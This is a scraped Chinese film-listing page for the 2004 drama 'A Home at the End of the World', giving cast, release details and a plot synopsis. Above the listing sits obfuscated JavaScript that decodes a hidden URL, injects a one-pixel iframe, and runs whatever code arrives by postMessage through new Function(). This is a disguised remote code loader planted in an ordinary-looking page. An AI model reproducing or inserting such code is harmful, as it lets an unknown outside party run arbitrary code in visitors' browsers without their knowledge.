if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 

天涯家园 A Home at the End of the World

资源:

类型:经典片 剧情 爱情 同性 2004

.

云播放

  • 云播放

《天涯家园 A Home at the End of the World》迅雷下载

《天涯家园 A Home at the End of the World》剧情介绍


导演: Michael Mayer
编剧: 迈克尔·坎宁安
主演: Andrew Chalmers / 瑞恩·唐洛胡 / Asia Vieira / Quancetia Hamilton / Jeff J.J. Authors / Lisa Merchant / Ron Lea / 艾瑞克·史密斯 / 哈里斯·艾伦 / 马特·弗里沃 / 茜茜·斯派塞克 / 柯林·法瑞尔 / 达拉斯·罗伯特斯 / 罗宾·怀特 / 肖恩·罗伯茨
类型: 剧情 / 爱情 / 同性
官方网站: wip.warnerbros.com/ahome
制片国家/地区: 美国
语言: 英语
上映日期: 2004-07-23
片长: 97 分钟
又名: 世界末端的家 / 末世之家 / 世界末日的家园
IMDb链接: tt0359423
2004天涯家园的剧情简介······   一次偶然中,鲍比(柯林·法瑞尔 Colin Farrell 饰)与乔纳森(达拉斯·罗伯特斯 Dallas Roberts 饰)重逢了,原来,两人曾是童年时期的亲密玩伴,鲍比羡慕乔纳森拥有温柔的母亲和温馨的家庭,乔纳森在鲍比的身上看到了自己渴望许久的自由与不羁。
  多年后的重逢让两位老友都十分兴奋,鲍比更是搬进了乔纳森的屋子成为了他的室友。乔纳森并非独居,和他住在一起的是漂亮姑娘克莱尔(罗宾·怀特 Robin Wright 饰),随着时间的流逝,鲍比发现自己不可救药的爱上了她,而鲍比明白,在克莱尔和乔纳森之间,他鱼与熊掌不可兼得。在一个配置特殊的家庭中,在友情与爱情之间,善良的鲍比不知该何去何从。

天涯家园 A Home at the End of the World精彩剧照海报

天涯家园 A Home at the End of the World精彩剧照海报

天涯家园 A Home at the End of the World精彩剧照海报

天涯家园 A Home at the End of the World精彩剧照海报

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved